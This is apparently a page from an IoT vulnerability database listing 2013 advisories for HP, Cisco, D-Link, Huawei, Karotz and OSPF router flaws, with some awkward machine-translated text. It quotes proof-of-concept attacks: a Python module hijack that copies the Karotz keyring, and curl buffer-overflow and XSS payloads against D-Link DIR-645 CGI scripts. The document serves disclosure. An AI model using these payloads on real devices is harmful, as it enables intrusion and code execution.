VARIoT IoT vulnerabilities database

Unspecified vulnerability on the HP LaserJet Pro P1102w, P1606dn, M1212nf MFP, M1213nf MFP, M1214nfh MFP, M1216nfh MFP, M1217nfw MFP, M1218nfs MFP, and CP1025nw with firmware before 2013-07-26 20130703 allows remote attackers to modify data via unknown vectors. plural HP LaserJet Pro Vulnerabilities exist in vulnerabilities that alter data.Data may be changed by third parties. The HP LaserJet Pro is a laser printer device developed by Hewlett Packard. Multiple HP LaserJet Pro products have security vulnerabilities that allow malicious users to bypass some security restrictions and gain unauthorized access to restricted data. Technical details are currently unavailable. We will update this BID as soon as more information becomes available. Remote attackers can exploit this issue to gain access to sensitive information that may aid in further attacks. Vulnerabilities exist in the following products and versions: P1102w, P1606dn, M1212nf MFP, M1213nf MFP, M1214nfh MFP, M1216nfh MFP, M1217nfw MFP, M1218nfs MFP, CP1025nw using firmware versions earlier than 2013-07-26 and version 20130703

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The CNA or individual who requested this candidate did not associate it with any vulnerability during 2013. Notes: none. The Cisco VC220 and VC240 cameras are network camera devices distributed by Cisco. The Cisco Video Surveillance VC220 Network Dome Camera and the Cisco VC240 Network Bullet Camera have security vulnerabilities that allow remote unauthenticated attackers to send specially crafted messages that prevent the device's WEBUI from being accessed, resulting in a denial of service attack

Huawei B153 is a mobile access device. The Huawei B153 3G/UMTS router firmware version 1096.11.405.03.111sp02 supports the WPS protocol for user convenience. Huawei B153 3G / UMTS is a wireless router product from China's Huawei. An access bypass vulnerability exists in the Huawei B153 3G / UMTS router. An attacker could use this vulnerability to bypass specific security restrictions and perform unauthorized operations. There are vulnerabilities in Huawei B153 3G / UMTS 1096.11.405.03.111sp02 version running firmware, other versions may also be affected

Multiple cross-site scripting (XSS) vulnerabilities in the JUnit files in the GWTTestCase in Google Web Toolkit (GWT) before 2.5.1 RC1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Google Web Toolkit 2.5.0 is vulnerable; other versions may also be affected

Electronic Arts Karotz Smart Rabbit Contains a privilege management vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Violet Karotz is a device called Wireless Smart Rabbit. Violet Karotz does not properly load Python modules, allowing attackers to build malicious .py files, hijack Python modules and execute malicious code. This attack requires a USB flash drive to be inserted into the Karotz unit without the need to switch Karatz. Trustwave SpiderLabs Security Advisory TWSL2013-021: Multiple Vulnerabilities in Karotz Smart Rabbit Published: 08/01/13 Version: 1.0 Vendor: Electronic Arts (http://www.ea.com/), formerly Mindscape, formerly Violet Product: Karotz Version affected: 12.07.19.00 Product description: Karotz is the successor to the "Nabaztag". Nabaztag is a Wi-Fi enabled ambient electronic device in the shape of a rabbit, invented by Rafi Haladjian and Olivier M\xe9vel, and manufactured by the company Violet.[1] Nabaztag was designed to be a "smart object" comparable to those manufactured by Ambient Devices; it can connect to the Internet (to download weather forecasts, read its owner's email, etc.). It is also customizable and programmable to an extent. Finding 1: Python Module Hijacking *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4867 CWE: CWE-427 During the setup process for a Karotz unit, if wifi is selected as the method used to connect to the Internet, a python script named "autorunwifi" is run as root to set up the wifi connectivity. Another file, named "autorunwifi.sig", contains a signature of autorunwifi signed with the private key for Violet, to prevent modifications to the "autorunwifi" script. In this case, it is possible to write a Python script named "simplejson.py" and place it in the same directory as the other setup files, which will cause the contents of simplejson.py to be executed at the beginning of the "autorunwifi" script execution. The following is a proof of concept "simplejson.py" file that will copy the pubring.gpg file from the Karotz onto the inserted USB key, which is processed with MD5 to produce the key used to decrypt the root filesystem for the Karotz: ## simplejson.py import os os.system("cp /karotz/etc/gpg/pubring.gpg /mnt/usbkey") ## end simplejson.py Finding 2: API Session Token Passed in Cleartext *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4868 There are two kinds of applications for the Karotz: hosted and external. Hosted applications are stored and run on the Karotz itself. External applications run outside the Karotz unit and control the Karotz through an api at api.karotz.com. Both types of applications must specifically request to use parts of the karotz in the manifest file of their application package. For instance, if your application uses the webcam and ears, you must specify in your application manifest that these will be used by your application before they will be available to your application. The control is performed over plaintext HTTP. As such, the session token authenticating API calls used to control the Karotz is available to an eavesdropping attacker. The session token can be used to perform any remote API call available to the application. For instance, if the application uses the webcam, a video could be captured using the webcam and sent to an arbitrary server. Vendor Response: No response received. Remediation Steps: No official patch is available. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Revision History: 06/19/13 - Attempt to contact vendor 07/10/13 - Attempt to contact vendor 07/12/13 - Attempt to contact vendor 08/01/13 - Advisory published Additional Credits: Discussion of Python module loading behavior and initial suggestion of application to Karotz by Jennifer Savage References 1. http://www.karotz.com 2. http://savagejen.github.io/blog/2013/04/28/python-module-hijacking/ About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format

The OSPF implementation on Brocade routers does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. Multiple Brocade routers are prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions and take full control of the OSPF AS domain routing table, blackholed traffic, and intercepted traffic. This may aid in further attacks

The OSPF implementation in Check Point Gaia OS R75.X and R76 and IPSO OS 6.2 R75.X and R76 does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. This vulnerability CVE-2013-0149 And related issues. Supplementary information : CWE Vulnerability type by CWE-694: Use of Multiple Resources with Duplicate Identifier ( Using multiple resources with duplicate identifiers ) Has been identified. Check Point Gaia is a unified security operating system. Check Point IPSO is a firewall operating system. Sensitive message information. Multiple Checkpoint appliances are prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions and take full control of the OSPF AS domain routing table, blackholed traffic, and intercepted traffic. This may aid in further attacks. Check Point Gaia OS R75.X and R76 versions, IPSO OS 6.2 R75.X and R76 versions have a vulnerability in the OSPF implementation process. Possibility of duplication of ID values

The OSPF implementation on Enterasys switches and routers does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. This vulnerability CVE-2013-0149 And related issues. Supplementary information : CWE Vulnerability type by CWE-694: Use of Multiple Resources with Duplicate Identifier ( Using multiple resources with duplicate identifiers ) Has been identified. Enterasys is one of the famous network vendors. Message information. Multiple Enterasys Products are prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions and take full control of the OSPF AS domain routing table, blackholed traffic, and intercepted traffic. This may aid in further attacks

The OSPF implementation on HP JD9##A routers; HP J4###A, J484#B, J8###A, JD3##A, JE###A, and JF55#A switches; HP 3COM routers and switches; and HP H3C routers and switches does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote authenticated users to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. Information disclosure vulnerabilities and denial of service vulnerabilities exist for multiple HP products. HP JD9##A, 3COM, H3C, etc. are all routers and switches of Hewlett-Packard (HP). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03880910 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03880910 Version: 1 HPSBHF02912 rev.1 - HP Networking Products including H3C and 3COM Routers and Switches, OSPF Remote Information Disclosure and Denial of Service NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. References: CVE-2013-4806 (CERT VU#229804 SSRT101224) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION section below for a list of impacted products. BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2013-4806 (AV:N/AC:M/Au:S/C:P/I:N/A:C) 7 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has made the following software updates available to resolve the vulnerabilities in the following products: Fixed Version HP Branded Products Impacted H3C Branded Products Impacted 3Com Branded Products Impacted R5000_3.14p14 JD935A HP 5012 Router JD943A HP 5232 Router JD944A HP 5642 Router JD945A HP Router 5642 TAA JD946A HP 5682 Router N/A 3Com Router 5642 TAA (3C13755TAA) 3Com Router 5012 (3C13701) 3Com Router 5232 (3C13751) 3Com Router 5642 (3C13755) 3Com Router 5682 (3C13759) R301X_1.40.23 JD916A HP 3012 Router JD919A HP 3018 Router N/A 3Com Router 3012 (3C13612) 3Com Router 3018 (3C13618) S5600_3.10.R1702P39 JD391A HP S5600-50C Ethernet Switch JD392A HP S5600-50C-PWR Ethernet Switch JD393A HP S5600-26C Ethernet Switch JD394A HP S5600-26C-PWR Ethernet Switch JD395A HP S5600-26F Ethernet Switch H3C S5600-26C Ethernet Switch (0235A11F) H3C S5600-26C-PWR Ethernet Switch (0235A11G) H3C S5600-26F Ethernet Switch (0235A11H) H3C S5600-50C Ethernet Switch (0235A11D) H3C S5600-50C-PWR Ethernet Switch (0235A11E) N/A E5500G_03.03.02p19 JE088A HP E5500-24G Switch JE089A HP E5500-24G Switch (TAA) JE090A HP E5500-48G Switch JE091A HP E5500-48G Switch (TAA) JE092A HP E5500-24G-PoE Switch JE093A HP E5500-24G-PoE Switch (TAA) JE094A HP E5500-48G-PoE Switch JE095A HP E5500-48G-PoE Switch (TAA) JE096A HP E5500-24G-SFP Switch JE097A HP E5500-24G-SPF Switch (TAA) JF551A HP SS4 SWITCH 5500G-EI 24PT (no psu) JF552A HP SS4 SWITCH 5500G-EI 48PT(no psu) JF553A HP SS4 5500G-EI 24 PORT SFP (no psu) N/A 3Com SS4 5500G-EI 24 Port SFP (NO PSU) (3CR17259-91) 3Com SS4 Switch 5500G-EI 24PT (NO PSU) (3CR17254-91) 3Com SS4 Switch 5500G-EI 48PT (NO PSU) (3CR17255-91) 3Com Switch 5500G-EI 24 Port (3CR17250-91) 3Com Switch 5500G-EI 48-Port (3CR17251-91) 3Com Switch 5500G-EI PWR 24-Port (3CR17252-91) 3Com Switch 5500G-EI PWR 48-Port (3CR17253-91) 3Com Switch 5500G-EI SFP 24-Port (3CR17258-91) 3Com TAA Compliant 5500G-EI 24-Port (3CR17250TAA-91) 3Com TAA Compliant 5500G-EI 48-Port (3CR17251TAA-91) 3Com TAA Compliant 5500G-EI PWR 24P (3CR17252TAA-91) 3Com TAA Compliant 5500G-EI PWR 48P (3CR17253TAA-91) 3Com TAA Compliant 5500G-EI SFP 24P (3CR17258TAA-91) E5500_03.03.02p19 JE099A HP E5500-24 SI Switch JE100A HP E5500-48 SI Switch JE101A HP E5500-24 Switch JE102A HP E5500-24 Switch (TAA) JE103A HP E5500-48 Switch JE104A HP E5500-48 Switch (TAA) JE105A HP E5500-24-PoE Switch JE106A HP E5500-24-PoE Switch (TAA) JE107A HP E5500-48-PoE Switch JE108A HP E5500-48-PoE Switch (TAA) JE109A HP E5500-24-SFP Switch, JE110A HP E5500-24-SPF Switch (TAA) N/A 3Com SS4 Switch 5500-SI 28 Port (3CR17151-91) 3Com SS4 Switch 5500-SI 52 Port (3CR17152-91) 3Com Switch 5500-EI 28-Port (3CR17161-91) 3Com Switch 5500-EI 28-Port FX (3CR17181-91) 3Com Switch 5500-EI 52-Port (3CR17162-91) 3Com Switch 5500-EI PWR 28-Port (3CR17171-91) 3Com Switch 5500-EI PWR 52-Port (3CR17172-91) 3Com TAA Switch 5500-EI 28-Port (3CR17161TAA-91) 3Com TAA Switch 5500-EI 28-Port FX (3CR17181TAA-91) 3Com TAA Switch 5500-EI 52-Port (3CR17162TAA-91) 3Com TAA Switch 5500-EI PWR 28-Port (3CR17171TAA-91) 3Com TAA Switch 5500-EI PWR 52-Port (3CR17172TAA-91) S3600.EI_3.10.R1702P34 JD326A HP 3600-24-PoE EI Switch JD328A HP 3600-48-PoE EI Switch JD331A HP 3600-24 EI Switch JD333A HP 3600-48 EI Switch JD334A HP 3600-24-SFP EI Switch H3C S3600-28F-EI - model LS-3600-28F-EI-OVS (0235A10L) H3C S3600-28P-EI - model LS-3600-28P-EI-OVS (0235A10H) H3C S3600-28P-PWR-EI - model LS-3600-28P-PWR-EI-OVS (0235A10C) H3C S3600-52P-EI - model LS-3600-52P-EI-OVS (0235A10K) H3C S3600-52P-PWR-EI - model LS-3600-52P-PWR-EI-OVS (0235A10E) N/A E.11.38 J4850A HP ProCurve Switch 5304xl J8166A HP ProCurve Switch 5304xl-32G J4819A HP ProCurve Switch 5308xl J8167A HP ProCurve Switch 5308xl-48G J4849A HP ProCurve Switch 5348xl J4849B HP ProCurve Switch 5348xl J4848A HP ProCurve Switch 5372xl J4848B HP ProCurve Switch 5372xl N/A N/A M.10.99 J4906A HP E3400-48G cl Switch J4905A HP ProCurve Switch 3400cl-24G N/A N/A M.08.140 J8433A HP 6400-6XG CL Switch J8474A HP 6410-6XG CL Switch N/A N/A HISTORY Version:1 (rev.1) - 8 August 2013 Initial Release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux) iEYEARECAAYFAlIDpdwACgkQ4B86/C0qfVldlwCcDDroDhqjX0UVp4i8jVvizBGx XcQAnjFZJnhpwE7xpI1wxQZ1tdrFvaGL =Q4Dh -----END PGP SIGNATURE-----

The web portal in Cisco Unified Communications Manager (Unified CM) allows remote authenticated users to obtain sensitive stack-trace information via unspecified vectors that trigger a stack exception, aka Bug ID CSCug34854. Vendors have confirmed this vulnerability Bug ID CSCug34854 It is released as.Remotely authenticated users can obtain important stack trace information. An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. This issue is being tracked by Cisco BugId CSCug34854. This component provides a scalable, distributed and highly available enterprise IP telephony call processing solution

Cross-site request forgery (CSRF) vulnerability in the User WebDialer page in Cisco Unified Communications Manager (Unified CM) allows remote attackers to hijack the authentication of arbitrary users for requests that dial calls, aka Bug ID CSCui13028. Vendors have confirmed this vulnerability Bug ID CSCui13028 It is released as.A third party could hijack the authentication of any user and dial out. Attackers can exploit this issue to perform certain administrative actions and to gain unauthorized access to the affected application. This issue is being tracked by Cisco bug ID CSCui13028. This component provides a scalable, distributed and highly available enterprise IP telephony call processing solution. A remote attacker can exploit this vulnerability to hijack the authentication of any user's call request

Multiple cross-site request forgery (CSRF) vulnerabilities in Cisco Unified Communications Manager (Unified CM) allow remote attackers to hijack the authentication of arbitrary users for requests that perform arbitrary Unified CM operations, aka Bug ID CSCui13033. Attackers can exploit this issue to perform certain administrative actions and to gain unauthorized access to the affected application. This issue is being tracked by Cisco bug ID CSCui13033. This component provides a scalable, distributed and highly available enterprise IP telephony call processing solution. Multiple cross-site request forgery vulnerabilities exist in CUCM

The OSPF implementation on the D-Link DES-3810-28 switch with firmware R2.20.B017 does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. This vulnerability CVE-2013-0149 And related issues. Supplementary information : CWE Vulnerability type by CWE-694: Use of Multiple Resources with Duplicate Identifier ( Using multiple resources with duplicate identifiers ) Has been identified. The D-Link DES-3810-28 is a switch device. Interrupt or obtain sensitive message information. Multiple Dlink Routers are prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions and take full control of the OSPF AS domain routing table, blackholed traffic, and intercepted traffic. This may aid in further attacks. There is a security vulnerability in the OSPF implementation process of the D-Link DES-3810-28 switch using firmware R2.20.B017. Possibility of duplicates of values

Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php. D-Link DIR-645 Router (Rev. A1) Contains a cross-site scripting vulnerability.By a third party via the following parameters Web Script or HTML May be inserted. (1) parentalcontrols/bind.php of deviceid Parameters (2) info.php of RESULT Parameters (3) bsc_sms_send.php of receiver Parameters. The D-Link DIR-645 Widget function has an unexplained security vulnerability that allows a remote attacker to exploit the vulnerability to gain unauthorized access to the device. The D-Link DIR-645 is a wireless router device. D-Link DIR-645 \"post_login.xml\", \"hedwig.cgi\", \"authentication.cgi\" incorrectly filters user-submitted parameter data, allowing remote attackers to exploit exploits to submit specially crafted requests to trigger buffer overflows, allowing applications to Stop responding, causing a denial of service attack. Remote attackers can exploit these issues to execute arbitrary code in the context of the affected device or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and perform unauthorized actions. Other attacks may also be possible. D-Link DIR-645 running firmware 1.03B08 is vulnerable; other versions may also be affected. Multiple vulnerabilities on D-Link DIR-645 devices ================================================== [ADVISORY INFORMATION] Title: Multiple vulnerabilities on D-Link DIR-645 devices Discovery date: 06/03/2013 Release date: 02/08/2013 Advisory URL: http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt Credits: Roberto Paleari (roberto@greyhats.it, twitter: @rpaleari) [AFFECTED PRODUCTS] This security vulnerability affects the following products and firmware versions: * D-Link DIR-645, 1.03B08 Other products and firmware versions could also be vulnerable, but they were not checked. All of them are exploitable by remote, unauthenticated attackers. Details are outlined in the following, including some proof-of-concepts. 1. Buffer overflow on "post_login.xml" Invoking the "post_login.xml" server-side script, attackers can specify a "hash" password value that is used to authenticate the user. This hash value is eventually processed by the "/usr/sbin/widget" local binary. However, the latter copies the user-controlled hash into a statically-allocated buffer, allowing attackers to overwrite adjacent memory locations. As a proof-of-concept, the following URL allows attackers to control the return value saved on the stack (the vulnerability is triggered when executing "/usr/sbin/widget"): curl http://<target ip>/post_login.xml?hash=AAA...AAABBBB The value of the "hash" HTTP GET parameter consists in 292 occurrences of the 'A' character, followed by four occurrences of character 'B'. In our lab setup, characters 'B' overwrite the saved program counter (%ra). 2. Buffer overflow on "hedwig.cgi" Another buffer overflow affects the "hedwig.cgi" CGI script. Unauthenticated remote attackers can invoke this CGI with an overly-long cookie value that can overflow a program buffer and overwrite the saved program address. Proof-of-concept: curl -b uid=$(perl -e 'print "A"x1400;') -d 'test' http://<target ip>/hedwig.cgi 3. Buffer overflow on "authentication.cgi" The third buffer overflow vulnerability affects the "authentication.cgi" CGI script. This time the issue affects the HTTP POST paramter named "password". Again, this vulnerability can be abused to achieve remote code execution. As for all the previous issues, no authentication is required. Proof-of-concept: curl -b uid=test -d $(perl -e 'print "uid=test&password=asd" . "A"x2024;') http://<target ip>/authentication.cgi 4. Cross-site scripting on "bind.php" Proof-of-concept: curl "http://<target ip>/parentalcontrols/bind.php?deviceid=test'\"/><script>alert(1)</script><" 5. Cross-site scripting on "info.php" Proof-of-concept: curl "http://<target ip>/info.php?RESULT=testme\", msgArray); alert(1); //" 6. Cross-site scripting on "bsc_sms_send.php" Proof-of-concept: curl "http://<target ip>/bsc_sms_send.php?receiver=testme\"/><script>alert(1);</script><div" [REMEDIATION] D-Link has released an updated firmware version (1.04) that addresses this issue. The firmware is already available on D-Link web site, at the following URL: http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000 [DISCLAIMER] The author is not responsible for the misuse of the information provided in this security advisory. The advisory is a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice

The OSPF implementation in Extreme Networks EXOS does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. This vulnerability CVE-2013-0149 And related issues. Supplementary information : CWE Vulnerability type by CWE-694: Use of Multiple Resources with Duplicate Identifier ( Using multiple resources with duplicate identifiers ) Has been identified. Extreme Networks EXOS is a network equipment product. information. ExtremeXOS is prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions and take full control of the OSPF AS domain routing table, blackholed traffic, and intercepted traffic. This may aid in further attacks

The OSPF implementation on NEC IP38X, IX1000, IX2000, and IX3000 routers does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. This vulnerability CVE-2013-0149 And related issues. Supplementary information : CWE Vulnerability type by CWE-694: Use of Multiple Resources with Duplicate Identifier ( Using multiple resources with duplicate identifiers ) Has been identified. NEC IP38X, IX1000, IX2000 and IX3000 routers are router devices. The route is interrupted or sensitive message information is obtained. Multiple NEC Products are prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions and take full control of the OSPF AS domain routing table, blackholed traffic, and intercepted traffic. This may aid in further attacks

The OSPF implementation on Yamaha routers does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. Yamaha routers is a router device. Multiple Yamaha products are prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions and take full control of the OSPF AS domain routing table, blackholed traffic, and intercepted traffic. This may aid in further attacks

The OSPF implementation on the Brocade Vyatta vRouter with software before 6.6R1 does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. This vulnerability CVE-2013-0149 And related issues. Supplementary information : CWE Vulnerability type by CWE-694: Use of Multiple Resources with Duplicate Identifier ( Using multiple resources with duplicate identifiers ) Has been identified. Brocade Vyatta vRouter is a router device. Text information. Multiple Brocade routers are prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions and take full control of the OSPF AS domain routing table, blackholed traffic, and intercepted traffic. This may aid in further attacks. There is a security vulnerability in the OSPF implementation process of Brocade Vyatta vRouter using the software version before 6.6R1

The OSPF implementation in Juniper Junos through 13.x, JunosE, and ScreenOS through 6.3.x does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. This vulnerability CVE-2013-0149 And related issues. Supplementary information : CWE Vulnerability type by CWE-694: Use of Multiple Resources with Duplicate Identifier ( Using multiple resources with duplicate identifiers ) Has been identified. Multiple Juniper Products are prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions and take full control of the OSPF AS domain routing table, blackholed traffic, and intercepted traffic. This may aid in further attacks. Juniper Junos, JunosE and ScreenOS are all operating systems of Juniper Networks (Juniper Networks). Junos is a network operating system dedicated to the company's hardware systems; JunosE is an operating system running on E-series IP edge and broadband service routers; ScreenOS is an operating system running on NetScreen series firewalls. sex

Unspecified vulnerability in HP Integrated Lights-Out 3 (aka iLO3) firmware before 1.60 and 4 (aka iLO4) firmware before 1.30 allows remote attackers to bypass authentication via unknown vectors. HP Integrated Lights-Out 3 ( alias iLO3) and HP Integrated Lights-Out 4 ( alias iLO4) Vulnerabilities contain vulnerabilities that prevent authentication.Authentication may be bypassed by a third party. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions on the affected computer. This may aid in further attacks. HP Integrated Lights-Out (iLO) is an embedded server management technology of Hewlett-Packard (HP), which uses an integrated remote management port to monitor and maintain the operating status of the server, and remotely manage and control the server. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03844348 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03844348 Version: 2 HPSBMU02902 rev.2 - HP Integrated Lights-Out iLO3, iLO4, and iLO CM IPMI, Cipher Suite 0 Authentication Bypass Vulnerability NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-07-16 Last Updated: 2013-08-19 Potential Security Impact: Authentication bypass Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP Integrated Lights-Out iLO3, iLO4, and iLO CM IPMI. The vulnerability could allow authentication bypass. References: CVE-2013-4805 (SSRT101250) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Integrated Lights-Out 4 (iLO4) firmware versions prior to v1.30 